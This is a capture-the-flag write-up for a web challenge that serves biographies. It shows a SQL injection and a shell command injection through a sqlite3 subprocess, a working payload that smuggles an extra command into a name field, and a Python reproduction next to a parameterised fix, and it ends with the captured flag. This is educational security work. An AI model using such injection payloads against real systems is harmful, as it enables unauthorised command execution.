Shafrira Goldwasser

Challenge Description

Challenge Attachment

The application presents a list of names; selecting one fetches the matching biography from a database.

SQL Injection

To find an attack vector we look at the source code.

The query is built by string concatenation, so user input is neither parameterised nor sanitised: that is a SQL injection. But even if we dump the whole database, the flag is not in it.

Command Injection

There is a second attack vector: command injection. The SQL query is not run through a database library; it is handed to the sqlite3 command-line client through a subprocess, so the same unsanitised input reaches the shell. The goal is to inject other shell commands alongside the sqlite3 command.

Doing this blind, without seeing the generated command line, is hard. So we run the app locally and print the generated command and its result to help construct the payload.

Using Burp Repeater we manipulate the user input until we find a working payload.

The payload is simple: we break out of the first command, which is

sqlite3 database.db "SELECT biography FROM cyberheroines WHERE name='userInput' "

To do that we close the double quote, append the injected command, and comment out the remaining garbage (the trailing ' " of the original command line). The first ' closes the SQL string literal, the " closes the shell argument holding the query, ;ls; runs ls as a separate command, and # turns the rest of the line into a shell comment.

Payload:

AdaLovelace'";ls;#
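As an added example (not the challenge's code), the following Python reproduces the string-built sqlite3 command line locally, shows how a POSIX shell tokenises the injected payload, runs it through a real shell, and contrasts it with a parameterised query that never touches a shell. The table rows, the helper names, the use of echo as a stand-in for the sqlite3 binary, and the "echo INJECTED" command used in place of ls are assumptions; the command-line layout, table and column names, and payload shape come from the write-up.

```python
"""Added example: local reproduction of the challenge's command injection.

Not the challenge's source. The command line and payload shape follow the
write-up; everything else (rows, stand-in binary, helper names) is assumed.
"""
import shlex
import sqlite3
import subprocess

# Constructed stand-in rows for the cyberheroines table (invented data).
ROWS = [
    ("AdaLovelace", "Wrote the first program for the Analytical Engine."),
    ("ShafriraGoldwasser", "Co-invented zero-knowledge proofs."),
]

QUERY_TEMPLATE = "SELECT biography FROM cyberheroines WHERE name='{}' "


def make_payload(injected_cmd: str) -> str:
    """Close the SQL literal, close the shell argument, run a command, comment the rest.
    make_payload("ls") reproduces the write-up's payload exactly."""
    return f"AdaLovelace'\";{injected_cmd};#"


# "echo INJECTED" replaces "ls" so the result is deterministic in a test.
PAYLOAD = make_payload("echo INJECTED")


def build_command(user_input: str, binary: str = "sqlite3") -> str:
    """Command line built by string concatenation, as the vulnerable app is assumed to do."""
    return f'{binary} database.db "{QUERY_TEMPLATE.format(user_input)}"'


def shell_tokens(command_line: str) -> list:
    """Tokenise like /bin/sh so the separate commands become visible.
    punctuation_chars=True makes ';' its own token; '#' starts a comment."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    return list(lexer)


def run_vulnerable(user_input: str) -> str:
    """Run the concatenated command through a shell (the bug: shell=True + untrusted input).
    'echo' stands in for the sqlite3 binary so this runs without sqlite3 installed;
    the shell parsing is identical, and the injected command still executes."""
    proc = subprocess.run(build_command(user_input, binary="echo"),
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def _seeded_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cyberheroines (name TEXT, biography TEXT)")
    conn.executemany("INSERT INTO cyberheroines VALUES (?, ?)", ROWS)
    return conn


def query_by_concatenation(user_input: str) -> list:
    """The SQL injection on its own, executed in-process: input spliced into the query text."""
    conn = _seeded_db()
    rows = conn.execute(QUERY_TEMPLATE.format(user_input)).fetchall()
    conn.close()
    return [r[0] for r in rows]


def run_hardened(user_input: str) -> list:
    """Parameterised query through the sqlite3 module: no shell, no string splicing."""
    conn = _seeded_db()
    rows = conn.execute("SELECT biography FROM cyberheroines WHERE name = ?",
                        (user_input,)).fetchall()
    conn.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    cmd = build_command(PAYLOAD)
    print("generated command line:", cmd)
    for tok in shell_tokens(cmd):
        print("  shell token:", repr(tok))
    print("shell output:\n" + run_vulnerable(PAYLOAD))
    print("SQLi only  :", query_by_concatenation("' OR 1=1 --"))
    print("hardened   :", run_hardened("AdaLovelace"), run_hardened(PAYLOAD))
```

The token listing is the "print the query" debugging step from the write-up made explicit: once the quote closes, everything after ; is a new command and everything after # is dropped. If the sqlite3 CLI had to stay, passing an argument list with shell=False would stop the command injection (the ; would be data inside one argument), but the SQL injection would remain; only the parameterised query removes both.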

Now back to the original web server: we use the same payload shape to find the flag.

Listing the current directory with ls shows no flag file.

Next we check the current working directory with pwd.

Then we list the files in the root directory /.

The flag file is there; we read its content with cat.

Flag

chctf{CH4ng3d_h0w_w3_th1Nk_of_pr00f$}
